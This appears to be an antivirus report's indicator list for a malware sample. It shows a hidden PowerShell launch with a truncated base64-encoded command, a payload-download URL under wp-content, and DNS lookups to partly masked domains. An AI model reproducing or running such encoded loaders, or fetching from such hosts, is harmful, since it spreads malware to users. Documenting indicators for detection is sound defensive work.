Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABNAG4AZwByAGgAdABxAHMAbABsAD0AJwBQAHIAeAByAHYAcwBkAHEAbwB5AHYAZwAnADsAJABZAGQAYgB0AHMAYQBjAHoAYgBoAHMAcgAgAD0AIAAnADEANgA2ACcAOwAkAEoAbABkAGgAYgBjAGwAdQA9ACc...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\916849.cvr
- 'ro#####perorsroute.org':80
- 'me###yab.com':443
- http://ro#####perorsroute.org/wp-content/9WtVQhBjl/
- 'me###yab.com':443
- DNS ASK ro#####perorsroute.org
- DNS ASK ag###enan.com
- DNS ASK fy####titute.com
- DNS ASK me###yab.com
- DNS ASK re#####.peppyemails.com